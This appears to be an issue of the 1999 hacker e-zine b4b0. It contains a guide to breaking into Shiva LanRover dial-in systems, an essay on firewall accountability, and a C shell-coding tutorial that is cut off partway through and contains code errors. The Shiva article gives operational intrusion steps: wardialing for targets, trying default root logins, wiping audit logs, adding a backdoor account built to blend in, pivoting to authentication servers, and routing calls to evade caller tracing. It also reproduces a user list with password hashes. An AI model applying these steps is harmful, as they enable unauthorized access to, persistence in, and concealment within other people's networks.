[ x - The Liberation of Vice - x ] _________ ______ _________ _________ /\ ___ \ /| \ /\ ___ \ /\ ___ \ / \ \ /\ \ | | |\ \ / \ \ /\ \ / \ \ /\ \ \ \ \__\ \ | | |_\ \__\ \ \__\ \\ \ \ \ \ \ \ < | | \\ \ < \ \ \ \ \ \ \ ___ `\ |/\_____ _\\ \ ___ `\\ \ \ \ \ \ \ \ /\ \ / / \ \ \ \ \ /\ \\ \ \ \ \ \ \ \__\ \\/____ \ \ \ \ \__\ \\ \ \__\ \ \ \________\ \ \____\ \ \________\\ \________\ \ / / \ / / \ / / \ / / \/________/ \/____/ \/________/ \/________/ s e v e n the experience of new ideas and obtuse perspective [ (c) 1999 The B4B0 Party Programme ] [ Disrupting the classes of school ] [ teachers around the world. ] [TABLE OF CONTENTS] (01). Introduction - [ph1x] (02). Hacking the Shiva-Lan-Rover - [Hybrid] (03). Womper Language Interpretor - [chrak] (04). My Day in Age - [Rhinestone Cowboy] (05). Coding a Shell From the Ground Up - [ph1x] (06). The Art of Writing Shell Code - [smiler] (07). The Telephone System/Network Part 1 - [pabell] (08). Revolution Against the Catholic Church - [schemerz] (09). bsaver.c Overview - [cp4kt] (10). Conclusion - [ph1x] Additional pieces included in this issue of b4b0 are... [ bouncer.c ] ----------> intruderx [ bsaver.c ] -----------> comp4ct and qytpo [ carp.c ] -------------> comp4ct [ carriers.txt ] -------> comp4ct [ encrypt.c ] ----------> tragen [ fbsd.tgz ] -----------> icesk [ gh-cgi.c ] -----------> fred [ misc.zip ] -----------> milcrat [ w00f.c ] -------------> cossack and smiler . -- ---b-4-b-0--r-e-v-o-l-u-t-i-o-n-a-r-i-e-z--- -- - | | ph1x ----------- -----> the chosen one : jsb4ch ---- --- -------> the undecided one . t1p ------- --------> acclaimed b4b0 admin gr1p ----- -- - -------> he whose accent slays . j\ ------ -- ---- -----> the freezing wonder chr4k ----- ------ ----> the one who operates with a blown mind comp4ct --- ------ ----> he whom claims to be a b4b0 saint . p4bell ---- ------ ----> the one called the golden child coss4ck ---------------> the one of proclamation sm1ler ----------------> he who is emotionally content . -- ---b-4-b-0--w-r-i-t-e-r-s--a-n-d--o-t-h-e-r--p-e-r-v-e-r-t-s--- -- - | | icesk emf zayten : pG schemerz jnz Hybrid assem polder . Qytpo e- rhinestone cowboy samj . --- Official IRC channel -> Efnet / #!b4b0 (not #b4b0) --- Most Idiotic Site Ever -> http://www.anticode.com --- Irc Chick of the Month -> MostHated --- Greets to -> #!animalcrackers, rhino9, samj's mom, duke, horizon, LJ & Falon, HNN, those who have helped us and that we forgot about *sorry*, chixy and miah of the netcis crew (some of us started there!), and the NRA --- Interesting Fact -> The now Irc fad of saying "HEH" was invented in #b4b0. So we must require you to say the following when using HEH: HEH (c) b4b0 1999 --- P.S. -> We need more supporters who will write things for us other than inetd backdoors. Submit your article/code/remarks/ascii submissions@b4b0.org - -- ---> interesting <--- -- - -- -- > http://www.babousa.org - baltimore academy for behavioral optometry -- -- > http://www.babo.com - best gossip in korea! -- -- > http://www.babo.com.au - babo morganti and partners -- -- > http://www.babo.net - those wacky germans -- -- > http://www.babo.org.uk - british association of balloon operators -- -- > http://www.alvo.com/tvbabo - babo tv -- -- > http://www.valhallabrewing.com/dboard/babo2000.htm - bay area brew-off ------------------------------------------------------------------------------- !b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0! ------------------------------------------------------------------------------- Greatest movie of all time, "Gummo": I walked into the fruit market today, the clerk thought I was some out of town hick. "Those apples will be 2 dollars a piece." He tells me. This is where I outsmarted him. I hand him a 5 dollar bill, and just as he's handing me a dollar change, I say... "keep it, were even." On the way out, I stepped on a grape. ****************************************************************************** [INTRODUCTION] ****************************************************************************** We have had several people who have taken charge as editor for this issue, but have not followed through with there responsibilities. Therefore, me (ph1x) the unreliable drug addict has been chosen to get all of the submissions together and put together a nice issue with good quality reading material. I have miraculously managed to do so, so read to your hearts desire, and enjoy this issue. HEH! PS. I apologize for the extreme lateness of this issue, it's just that jsbach *cough* I mean... various people said they were going to write articles, and never did. =) -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- Hacking the Shiva-LAN-Rover System -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- By Hybrid (th0rn@coldmail.com) April 1999 Contents: 1. Introduction 2. What can Shiva lan rovers do? 3. The command line 4. System security 5. PPP 1. Introduction Shiva systems are becoming increasingly popular in the LAN networking world. If like me you have done quite alot of scanning you would have come accross a login prompt similar to this: [@ Userid:] If you have never seen this before, take a look at some of the 9x scans at www2.dope.org/9x. In this file I am going to fokus on the security strengths and weaknesses of the ShivaLanRover networking system, and give a general overview of what can be done with such systems. The Shiva system is a network security problem in it's own right, in the sense that once you have gained access to one of these platforms, you have the opotunity to explore the entire network on which the system is based, in essance, you are on the trusted side of the firewall. If you would like a copy of the ShivaLanRover software just FTP to ftp.shiva.com or get it via the WWW. To find a Shiva, the first thing you should do is dust off that old wardialer program, and start scanning local or toll-free prefix assignments, if you can't do this, you suck, go away. You will know when you have found a Shiva when you are confronted with the following prompt: @ Userid: or if Radius authentification is enabled: Starting Radius Authentification.... @ Userid: Blah, ignore the radius authentification thing for now, it's just a lame attempt to make the system look as if it has been secured, in most cases the sysamin would have missconfigured the authentification and you will be supprised as to how easy it is to get in. So you are at the login prompt, what next? - As in most OS's Shivas have a nice set of default logins, so the sysadmins poor setup is your gain. Try this: login: pass: . The root login will work 9 times out of 10. The reason that the root account works alot is beacuse in some cases the admin is not even aware the account even exists! Most of the system setup is done via the main terminal, so the admin does'nt have to login. the root account is not listed in the userfile database, so most admin's overlook it. In some cases the admin would have set up there own acount with somthing like but if the admin has any common sense you will not get in with that. Like most OS's, Shiva systems have an audit log, so don't sit there trying to brute force anything, once you are in, you can clear the system log, but more on that later. OK, you've found a Shiva, you've loged on as , now what? - read on. Once logged in, you will be droped into the Shiva command line prompt, which should look somthing like this: Shiva LanRover/8E, Patch 4.5.4p6 98/06/09 (Version and type of Shiva) ShivaLanRover/8E# (The command prompt. Can be configured to say anything) To get a list of the available commands type or this will reveal a menu similar to this: ShivaLanRover/8E# ? alert Send text alert to all dial-in users busy-out line Busy-out serial line modem clear Reset part of the system comment Enter a comment into the log configure Enter a configuration session connect Connect to a shared serial port crashdump Write crashblock to log disable Disable privileges help List of available commands initialize Reinitialize part of the system lan-to-lan Manage LAN-to-LAN connections passwd Change password ping Send ICMP echo to IP host ppp Start a PPP session quit Quit from shell reboot Schedule reboot show Information commands, type "show ?" for list slip Start a SLIP session telnet Start a Telnet session testline Test a line The first thing you should do is check to see who is online, at the # prompt use the show command to reveal the list of current online users: ShivaLanRover/8E# show users Line User Activity Idle/Limit Up/Limit 1 jsmith PPP 0/ 10 0/ None 2 root shell 0/ 10 0/ None Total users: 2 So here we see ourselves loged in on line 2, and a PPP user on line 1. Note that most of the time users are not configured to be allowed remote dialin PPP access, so the user jsmith is probably at a terminal on the LAN. Now you can see who is online, ie- check the admin is not loged in. Now you need to get a rough idea of the size of the system and it's network. At the # prompt type: ShivaLanRover/8E# show lines Async Lines: Line State Rate/P/Stop/ RA|DCD|DSR|DTR|RTS|CTS|Fr errs| Overruns|PErrs 1 IDLE 57600/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0 2 CHAR 57600/N/ 1/ |ON |ON |on |on |ON | 2| 0| 0 3 IDLE 57600/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0 4 IDLE 57600/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0 5 IDLE 57600/N/ 1/ |OFF|OFF|on |on |OFF| 0| 0| 0 6 IDLE 115200/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0 7 IDLE 57600/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0 8 IDLE 115200/N/ 1/ |OFF|ON |on |on |ON | 0| 0| 0 Here we see a list of the modem ports, as you can see it has 8, this is about average for most Shiva systems. So now we know how many serial lines there are, we need to get a rough idea as to how big the network itself is, to do this type: ShivaLanRover/8E# show arp Protocol Address Age Hardware Addr Type Interface Internet 208.122.87.6 4m x0-x0-B0-2x-Dx-78 ARPA Ethernet:IP Internet 208.122.87.4 4m AA-0x-x4-00-0C-04 ARPA Ethernet:IP Internet 208.122.87.5 4m Ax-00-04-0x-xD-x4 ARPA Ethernet:IP Internet 208.122.86.4 10m AA-x0-04-00-0C-04 ARPA Ethernet:IP Internet 208.122.86.40 0m AA-00-04-00-x1-04 ARPA Ethernet:IP Internet 208.122.86.147 4m 00-80-5x-31-F8-Ax ARPA Ethernet:IP Internet 208.122.86.145 4m 00-80-5x-FE-C9-x8 ARPA Ethernet:IP Internet 208.122.86.200 0m 00-x0-A3-xF-21-C8 ARPA Ethernet:IP Internet 208.122.86.51 4m 00-x0-B0-01-36-3x ARPA Ethernet:IP Showing the arp cache reveals some of the connected boxes to the LAN, aswell as ethernet address, and type of protocol. Now we have established the kind of system we are on, it's time to do some exploring, which is where I shall begin this text file. 2. What can Shiva lan rovers do? Shiva LanRover systems are very big security weaknesses if installed on any network. The reason for this is that some of the default settings can be easily overlooked by the admin. A Shiva system can be configured to provide a wide variety of network services, some of which are listed here: PPP (point-to-point protocol) This is the key to gaining access to the network on which the Shiva is based upon, in most cases the network will have an internal DNS server, and if you are lucky, the network which the system is based will be connected to the internet. Hint hint, PPP, toll-free. But just using a Shiva for free net access would be boring, which is why I am going to discuss the other features of Shivas. Modem Outdial. In alot of cases the system would have been configured to allow modem outdialing which can be good for calling BBS's, diverting to other dialups, scanning, but again, this is lame, just using a Shiva for modem outdialing is boring, use your imagination. If you manage to get a PPP connection, and the system is net connected, you could get online, and at the same time call your favourite BBS. I'll explain how to do all of this later. Telnet, ping, traceroute etc. These are the command line tools which will enable you to determine whether the system is connected to the internet or not. More on this later. It's time to go into detail about all of the Shivas functions and commands, I will concentrate on what you can do with root access, because that is the only account you are likely to gain access to. 3. The command line When loged into the Shiva shell, you have the following commands at your disposal: alert (Send text alert to all dial-in users) - Self explanitory. busy-out uart (Busy-out UART port) clear (Reset part of the system) The clear command is a nice feature of the Shiva system. The first thing you should do when on a Shiva is make sure you erase all logs of your commands and login times etc.. to do this all you need to do is type This will erase and reset the audit log, and also any invalid logins to the Shiva. There are also other clear commands such as etc, but these will all cause system problems and get you noticed, best leave this alone for the time being. comment (Enter a comment into the log) configure (Enter a configuration session) Heres the part where you can get the system to do what you want it to do, ie- to get a PPP connection you will need to set up another account with shell and PPP privalages. The root account does not allow PPP connections, so here is where you will need to do your stuff. To get anywhere with a Shiva you need to create a new account, using the config command you can create a new user account with greater privalges than root. Before you make a new account it is a good idea to see what kind of setup the other accounts have on the system, you don't want to make an account that will stick out from the other accounts, so type: show security (this gives a list of the security configuration and the user list.) you should see somthing like this: [UserOptions] PWAttempts=0 ARARoamingDelimiter=@ ExpireDays=30 GraceLogins=6 [Users] admin=/di/do/rt/pw/sh/pwd=hH8FU4gBxJNMMRQ0yhj5ILUbaS/ml=3/fail=1/time=425 jsmith=/di/pw/pwd=.b9BJFBhuA1vuqFa9s8KBlxmngZ/ml=2/time=897646052 mjones=/di/pw/pwd=kRaOhlyT7CKMBldLVBVbektbCE/ml=2/fail=5/time=897646052 user911=/di/pw/pwd=7Xkq8TOwB4juRI51OHkDVVos8S/ml=2/time=910919159 another=/di/pw/pwd=YhzD6KBUB7Lh2iKKKSWxuR0gx7S/ml=2/fail=7/time=90767094|9 jadmams=/di/pw/pwd=ET0OhPyT7CyMBldLLKVbektbCE/ml=2/time=902262821 msmith=/di/pw/pwd=sDV1Jxo8QJncIRcl9eoVO6SKBE/ml=2/time=897646052 dsmith=/di/pw/pwd=pv8OhPyT45CyMBldLSKVbektbCE/ml=2/time=897646052 padacks=/di/pw/pwd=HoDVw5MqTM*oTL69tBehqt7tiS/ml=2/time=897646052/grace=1 ljohnson=/di/pw/pwd=r.y9NJbrCWKfsSeu9FbfJpAIzZ/ml=2/time=897646052 Here we get a list of the configured users on the system. As you can see the admin has made him/herself their own account, while other users have accounts that allow logins via their terminals, but not remotely. In the above example all the users have been assigned passwords, so it would be a good idea when you make your own account to have one aswell. The idea is to make an account that will blend in with the others and not look to obvious. The passwords in the external user list are all 3DES (triple DES) encrypted. The type of user account set up is determined by the options, such as jsmith=/di/do etc, more on these functions in a bit. OK, now we need to set up our own account, to do this we need to enter a configuration session, at the command line prompt type: ShivaLanRover/8E# config You will then drop into the configuration session. Enter configuration file lines. Edit using: ^X, ^U clear line ^H, DEL delete one character ^W delete one word ^R retype line Start by entering section header in square brackets [] Finish by entering ^D or ^Z on a new line. config> (here is where you enter the config commands, to make you own account do the follwing) config> [users] config> username=/di/do/sh/tp/pw config> ^D <------ (type control D to finish) Review configuration changes [y/n]? y New configuration parameters: [users] username=/di/do/sh/tp/pw Modify the existing configuration [y/n]? y You may need to reboot for all changed parameters to take effect. You've just created your own user account which you can use for PPP connections etc. To begin with your account is un-passworded, so when you log back in just hit enter for your password, you can later change this. The /sh part of the user configuration means you can remotely log into the command shell, /pw means you have the ability to define your own password, if you wanted to give yourself another root account, you would use the switch /rt. In combination with the show config command you can also alter other system configurations via this method, although it is a very good idea not to alter anything. Now your account has been set up, all you do is re-connect to the system and login as your username, more on this later. connect (Connect to a serial port or modem) This is another one of the good features of Shivas, you can remotely control a series of modems on the system, and in alot of cases dialout. If you want to call a BBS, note you cannot upload using Zmodem or similar protocols, although you would be able to download, but expect a few CRC checksum errors. To connect to a modem type: connect all_ports you will then drop into one of the modem pools, as follows: Connecting to Serial2 at 115200 BPS. Escape character is CTRL-^ (30). Type the escape character followed by C to get back, or followed by ? to see other options. (here basic modem commands are nessasary, use the follwing to dialout) ATZ (initialise modem) ATDTxxxxxxxxx (atdt then phone number) note in some cases the modem outdial with be based upon the system PBX, so sometimes you will have to figure out the outdialing code, which should be somthing simple like dialing a 9 before the number you want to connect to. To disconnect from the outdialing session type control C, or ^C. This will take you back to the command line. As with the other system events, outdialing is loged into the audit file, along with the number you called. It is generaly a good idea to clear the audit log after things like PPP or dialout, again just type clear log . cping (Send continuous ICMP echoes to IP host) crashdump (Write crashblock to log) detect (Detect the configuration of an interface) disable (Disable your root privaleges) dmc (Information commands, type "dmc ?" for list) down (last Remove modems from CCB pool) info (Print info for specified modem) mupdate (l Update Rockwell modem FW) state (Print state of a modem) status (Print status of all modems) trace (Trace message passing) up (lastmo Add modems to CCB pool) test_1slot (Tests DMC card in slot specified) test_allcards (Tests all DMC cards found in system) test_golden (Tests all DMC cards against a Golden DMC) test_loopall (Tests All DMC's for count) test_modempair (modem1 Tests modems against each other) test_slotpair (Tests a DMC card against another) test_xmitloop (Tests modem pair for count) help (List of available commands) history (List of previous commands) initialize (Reinitialize part of the system) l2f (L2F commands) close (Close tunnel to L2F HG) login (Start L2F session) tunnels (Show open tunnels) lan-to-lan (Manage LAN-to-LAN connections) passwd (Change password) ping (Send ICMP echo to IP host) ppp (Start a PPP session) quit (Quit from shell) reboot (Schedule reboot) route (Modify a protocol routing table) rlogin (Start an rlogin session) show (Information commands, type "show ?" for list) show+ account (Accounting information) arp (ARP cache) bridge (Bridging information) buffers (Buffer usage) configuration (Stored configuration, may specify sections) the show config command will reveal all the system configuration setups, includings DNS server information, security configurations, IP routing etc. It will also show the internal IPs of radius authentification and TACAS servers. show+ finger (Current user status) interfaces [name1 [name2 ... ] (Interface information) ip (Internet Protocol information, type "show ip ?" for list) To get an idea of the routing information, and again how big the network is type, show ip route. This will bring up a routing table, and again give you an idea as to where the connected boxes are, it is a good idea to note the IP prefixes. show+ lan-to-lan (LAN-to-LAN connections) license (Licensing information) lines (Serial line information) log (Log buffer) The show log command will display the system audit log in more format. Here you will be able to see what is going on on the system, ie- is it primarily used for PPP, dialout etc. If users use the system for outdialing, you can even see the numbers that they dial. Here is a cut down example as to what you wiuld see in a system log file: Mon 15 16:24:29 GMT 1998 4530 Serial4: "krad" logged in 00:01 4531 Serial4:PPP: Received LCP Code Reject for code 0D 00:01 4532 Serial4:PPP: Received PPP Protocol Reject for IPXCP (802B) 00:00 4533 Serial4:PPP:IP address xx.xx.xx.xx dest xx.xx.xx.xx bcast 00:00 4534 Serial4:PPP: IPCP layer up 00:04 4535 Serial4:PPP: CCP layer up 14:09 4536 Serial4:PPP: IPCP layer down 00:00 4537 Serial4:PPP: CCP layer down 00:00 4538 Serial4:PPP: LCP layer down 00:01 4539 Serial4:PPP: CD dropped on connection 00:00 4540 Serial4: "krad" logged out: user exit after 14:17 (Dial-In PPP,) 00:06 4541 Serial4: Rate 115200bps 00:00 4542 Serial4: Modem string 'AT&FW1&C1&D3&K3&Q5&S1%C3\N3S95=47S0=1&W' 00:01 4543 Serial4: Initialized modem 04:56 4544 setting time of day from real-time clock to Wed Nov 25 16:43:44 18:27 4545 Serial4: New Dial-In session 00:00 4546 Serial4:PPP: LCP layer up 00:00 4547 Serial4: "krad" logged in 00:01 4548 Serial4:PPP: Received LCP Code Reject for code 0C 00:00 4549 Dialin:IPX configured net 9823O049 00:00 4550 Serial4:PPP: IPXCP layer up 00:00 4670 Serial4: New Command Shell session 00:03 4671 Serial4: "root" logged in 01:38 4672 Serial4: "root" logged out: user exit after 01:42 (Command Shell) 00:06 4673 Serial4: Rate 115200bps 00:01 4674 Serial4: Modem string 'AT&FW1&C1&D3&K3&Q5&S1%C3\N3S95=47S0=1&W' 00:00 4675 Serial4: Initialized modem 55:11 4676 Could not parse IP SNMP request. In the system log, you will also see invalid login attempts, error messages, and general system events. Because the log file logs everything, it is a good idea to erase your own presence in it. show+ modem (Internal modem information, type "show modem ?" for list) netbeui (NetBeui information, type "show netbeui ?" for list) novell (NetWare information, type "show novell ?" for list) ppp (PPP multilink bundles and links) processes (Active system processes) security (Internal userlist) semaphores (Active system semaphores) slot (Internal serial slot information, type "show slot ?" for list) upload (Upload information) users (Current users of system) version (General system information, also shows DNS info) virtual-connections (Virtual Connection information) slip (Start a SLIP session) telnet (Start a Telnet session) tftp (Download new image, ie- system config files) tunnel (Start a Tunnel session) wan [action] (Perform actions on WAN Interface) 4. System security Shivas can be very weak on security, due to the exposed root account. If the system is configured properly they can be very secure systems, although this is usually not the case. There are many security options for the Shiva system including Radius Authentification, SecurID, TACAS, and just the standard secured login. In some cases an admin will use a secondary server to act as the Radius Authentification. In this case, the setup would look somthing like this. [RADIUS Authentification Server] } The server contains a secured user | list, which will be used to verify | login requests. The login is [Router] determined if the user can be | | verified by the server. | | } The Shiva sends the login request to RADIUS. [Shiva System] } Starting Radius Authentification... @ Userid: Sometimes a system will be configured to work with a number of different Shivas on a network. For example, using the same idea as above, but without the Radius server, a secondary shiva may be installed to act as the security server, whereas all other Shiva systems refer to it for user login verification. This can be a real bitch if you have loged into a system, but the above setup has been implemented. For example, say you loged in as root, and you want to set up a PPP account. The first thing you would do is check to see what kind of setup existing users have by typing If the verification server has been setup, there will be no users in the user list, instead you have to find the network location of the verification server, and hope it has an un-passworded root account on it. To find the verification srever, or primary Shiva, just use the show config command. you can then telnet from the Shiva you are on, to the Shiva displayed in the config file, you should then get the @ Userid: login screen again, try root no pass, if this does not work, it is possible to temorarily configure your own server on the network, but this would mean other users will not be able to login, so leave this alone. If you do manage to login to the server as root, you have to setup your user account there, because that is where all the Shivas on the network refer to in order to verify users, this way the admin only has to maintain one user configuration file. 5. PPP Once you have setup a user account with shell and PPP privaleges, you can begin exploring the network on which the Shiva is based upon. If the network is net connected you can get free net access aswell, but this is quite risky, especially if the admin notices PPP sessions active at 4am, with destinations such as irc.ais.net:6667. When you first establish a PPP connection to a Shiva server, the first thing you should do is map out the network. To do this just run a network, or port scanner accross the domain which the Shiva is on. As on most networks, you are likely to come accross a variety of different boxes, such as UNIX boxes, SunOS, shared printers, mail servers, cisco routers, in one case someone I know found an Amiga box@$!. If the network is net connected, it is a good idea to use your shell for any net connections, such as IRC. Once you have an external net connection from a Shiva it is also possible to similtaniously dialout accross the PSTN to a BBS or any other system. To do this, you would have to find the network address of the Shiva server you are on, then telnet back to it and re-login. using the command will give you control over the system modems, then you can dialout as if you where in terminal mode. If the Shiva you are on is located on a toll-free number, or even local, it is not a good idea to use it for net access, or stay on it for a long time. If you must use a Shiva for net access, it is a good idea to use your PSTN routing skills, and not dialup to the system directly. The mistake people make when it comes to ANI, or CLID is that they think only 800 numbers have ANI, and residential numbers have CLID. This is *wrong* the ANI service can be setup by anyone, it's a choice, not a standard. If you want to route your call, the best thing to do is route internationaly, so your origionating clid gets striped at intralata boundarys on the PSTN. A technique, which I don't wanna give out involves trunk and carrier hoping. We'll thats about it for this file, hope you enjoyed it. If you want more information on the Shiva Lan Rover system, just check out shiva.com, they will have technical guides in pdf format, you can also download the shiva software from their ftp site. Shouts to the following: [9x] substance phriend siezer vectorx statd blotter knight network specialK microdot katkiller xramlrak bosplaya deadsoul and nino the 9x g1mp. [b4b0] gr1p t1p. #9x #darkcyde Efnet. backa xio. [D4RKCYDE] downtime elf zomba force mortis angel dohboy brakis alphavax tonekilla bishopofhell sintax digitalfokus mistress. -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- Womper Language Interpretor, by chrak -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- This is a neat language interepor by chrak, that is still in developement. Check out /w0mper, and make sure to read Example.sh to see a set of example code. * NOTE * this isn't quite finished and hopefully chrak will come through with more releases. Thank you. -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- My day in Age, by Rhinestone Cowboy -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- I had an epiphany the other day. It wasn't the kind of flash of insight that makes you shave your head, move to the desert, and change your name to something that sounds like an astronomical phenomena, but I do think it's something that other people need to hear. You see, I am a professional consultant, and with this project, I became a man. I was tasked with building a firewall for a healthcare facility. This wasn't very difficult, and, apart from the planning phases and alot of mostly useless meetings, it got built in a day or two. All the exceptions were put in place, and the LAN was protected to a dgree to which it had never been protected before. All was right with the world... ... Until the client got involved. It started with a simple request. "Could you please open up telnet services in the firewall to this one particular Solaris box? We have a few outside consultants who need to get into that box so they can work remotley. In particular, we have a user from an educational facility who needs remote root access." I objected, of course, but I was then informed that it was the opinion of the IS staff, that this was an "acceptable risk." This wasn't an opinion that could be justified by anyone, especially after they shelled out countless thousands of dollars on a "network security solution". It got a little worse, of course. About a week later, I uncovered a bug in there web front end to their database. Instead of praise, I got what I should have expected, exchanges like the following: "Only people who subscribe to this database should have access. Now you are telling me that ANYONE on the net can get this data for free? What the hell is that firewall doing?" "The firewall is doing it's job. The problem is that your web app. Never asked me for anything like a password. It just gave me access. It really wasn't complicated at all. A fireall simply cannot fix your buggy software. "Firewalls make computers secure. This computer isn't secure. Obviously, the fireall you made, doesnt work." He just didn't get it. I would have been more then happy to spend the time to audit all the machines individually, apply the proper patches, and fix any configuration errors that may rear their ugly heads, if the client was willing to pay for my time. Hell, i'd even work hard! Unfortunatley, the client didn't want to hear that. He wanted his "magic bullet, " and if I wasnt willing to provide it, he'd hire another consulting company to do it. It then occurred to me, that this senario is being played out all over the net, and it's alot bigger then I had previously realized. I was playing a part, so was the IS director, so was my company, and so was the firewall. Corporate America is all about "covering your ass." No one wants accountability for anything. If bullshit and 'passing the buck' were the keys to world domination, the USA would be the world's only super power. Wait, never mind... Anyway, this is what hit me. Firewalls do alot more then filter packets and give IS gimps a warm fuzzy feeling when they go home at night. Firewalls manage to almost universally remove any traces of accountability in corporate security. As in the above example, if, I mean when, someone sniffs the root password and usese it to compromise the LAN, the IS depart- ment can pretend that they weren't at fault. They can pass the buck to me or my company. Fortunatley, there is a contract protecting us from lawsuits of that nature. If necessary, the buck can even be passed, either by my company or the clients, to the vendor. Even they can pass the buck, since any rational person would realize that they weren't involved in this morass. The myth of the "fireawall as a magic bullet" is some of the most useful bullshit ever spun. It allows everyone to sleep easier at night and make alot of money. Of course, the buck ultimately stops getting passed by another piece of bullshit, the myth of "the genius hacker." I'm not saying that there aren't some genuinely brilliant people breaking into computers these days, but chances are they aren't relying on a 5 year old sniffer running on a SunOS 4.1.3 box in an .edu site, which is silly enough to have a guessable NIS mapname. The world is very broken. We have security products that either simply don't work, don't work up to the impossible expectations put on them , or even introduce furthur holes in hosts and networks they are suppose to be protecting. We also have a world of corperate IS managers, mostly incompetent "security consultants", and talentless bullshit artists who manage to social engineer their way into six figure incomes because they are "reformed hackers." It would be nice if some kind of messiah of the computer age were to come along and make it all better. Unfortunately, that's not going to happen. If there was such a person, we'd either nail him to a cross or he would opt for the huge paycheck which comes with playing a part in the system. I suspect I have finally entered into adult life, because I have little or no desire to change an awfuld system that I can not fix. There are quite a bit of rewards for being as corrupt as everyone else. So here is the choice facing us all, either sit down at the table of corruption and shared guilt and get paid alot (basically sell out) or fight a hopeless battle against American corporate culture. I think adulthood is really choosing to play in the "bullshit playground" with the rest of the grownups. Today, I am a man. Rhinestone Cowboy -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- Coding a Shell from the Ground Up, by ph1x -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- This article I am going to discuss what a shell is, how a shell works and were going to build a shell from the ground up. For all source were going to be writing today, we will need b4b0shell.h included below. Let's get started. A shell is a program that does command interpretation. A shell can also be reffered to as a command processor, as most DOS users know. It reads input, then executes the command. The execution of a command, is basically creating a child process for the execution. For example, the shell will fork() a child process to execute the command. The parent (the shell) will then wait for its child to finish before it reads another command. Before we start coding, make sure your using the following header file in all of your codez. /**********************************/ /* Header file for the b4b0 shell */ /* Extrapolated from ush.h, and */ /* added onto. ph1x@b4b0.org */ /**********************************/ /* NOTE: We won't be making use of this whole header file today our shell is not going to have the complexity of your standard unix shell that you use from a daily to daily basis. */ #include #include #include #include #include #include #include #include #include #define STDMODE 0600 #define DELIMITERSET " ><|&" // we are only going to add redirection to // our shell, not background or pipe support #ifndef MAX_CANON #define MAX_CANON 256 #endif #define TRUE 1 #define FALSE 0 #define BLANK_STRING " " #define PROMPT_STRING "b4b0$" #define QUIT_STRING "quit" #define BACK_STRING "&" // for background process #define PIPE_STRING "|" // pipe support #define NEWLINE_STRING "\n" #define IN_REDIRECT_SYMBOL '<' //redirection #define OUT_REDIRECT_SYMBOL '>' // symbols #define NULL_SYMBOL '\0' #define PIPE_SYMBOL '|' #define BACK_SYMBOL '&' #define NEWLINE_SYMBOL '\n' int makeargv(char *s, char *delimiters, char ***argvp); int parsefile(char *inbuf, char delimiter, char **v); // this will return // the token following delimiter if its present in *s. int redirect(char *infilename, char *outfilename); // performs redirection int connectpipeline(char *cmd, int frontfd[], int backfd[]); /*************************-=EOF=-******************************/ First we will write an extremely basic command interpreter, just for you to get a basic idea as to how a shell calls a child process to execute commands, and for you to experiment with. ---------------------------bsh v1.0----------------------------------- #include "b4b0shell.h" #define MAX_BUF 500 void main(void) { char input[MAX_BUF]; char **rargv; while(1) { fprintf(stderr, "%s\n" PROMPT_STRING); fgets(input, MAX_BUF, stdin); if(strcmp(input, QUIT_STRING) == 0) break; else { if( fork() == 0) { if(makeargv(input, BLANK_STRING, &rargv) > 0) execvp(rargv[0], rargv); } wait(NULL) } } exit(0); } --------------------------------EOF----------------------------------------- Pretty simple huh? When you run it, go ahead and execute some basic programs, like ls, grep, find etc. It works! Now, as I said before this is a very raw basic shell, and does not support wiledcards like '*' or '?'. Also, it doesnt support certain commands like 'cd' which is available in any good shell. If by some chance the wait() isnt called? Well, not too much of a problem, but if a user enters a command before the previous one is executed, the commands will execute cocurrently (read my article on cocurrency). Also, due to the fact that this first version we wrote does not find errors on the execvp() call it gets fucked up if you enter an invalid command. Your shell wont get control back from the child process and the child process creates its OWN shell. So you have to type 'quit' to get back to your parent shell. Let's write a better version of this shell, that handles errors with execvp(), and we will also replace the #define'd MAX_BUF with MAX_CANON(located in b4b0shell.h). Because MAX_BUF is nonportable. ----------------------------bsh v2.0------------------------------------- #include "b4b0shell.h" void execthecommand(char *incmd) { char **rargv; if(makeargv(incmd, BLANK_STRING, &rargv) > 0) { if(execvp(rargv[0], rargv) == -1) { printf("Invalid command\n"); exit(1); } } exit(1); } void main(void) { char input[MAX_CANON]; pid_t child_pid; while(1) { fputs(PROMPT_STRING, stdout); if (fgets(input, MAX_CANON, stdin) == NULL) break; if(*(input + strlen(input) -1) == NEWLINE_SYMBOL) *(input + strlen(input - 1) = 0; if(strcmp(input, QUIT_STRING) == 0) break; else { if ((child_pid = fork()) == 0) { execthecommand(input); exit(1); } else if(child_pid > 0) wait(NULL); } } exit(0); } ------------------------------EOF----------------------------------------- We made several changes to version 2 of our shell. Notice we used fputs() instead of fprintf() for the command line. fputs() prints a defined string alot faster. Also, notice we did some more error checking in this version. Also notice we now have the function execthecommand() to replace the original execvp() and makeargv calls. Control will never come back from the function execthecommand(), so you shouldnt be having a problem when you enter invalid commands. Unix deals with input/output through file descriptors. A program has to open a file or a device before it can access it. It will then access the file using a handle that is returned by open() syscall. With the support of re-direction, you can do stuff like this. b4b0$ cat < input.txt > output.txt That command redirects its standard input to 'input.txt' and its output to 'output.txt'. The following, is a revised version of execthecommand() function that you can use to support redirection. I basically made execthecommand() parse *incmd, which might give possible redirection. It then calls redirect() to perform the actual redirection, and makeargv() create the command array. It then execs the command. -----------------------------execthecommand() v2.0 by ph1x-------------------- #include "b4b0shell.h" void execthecommand(char *incmd) { char **rargv; 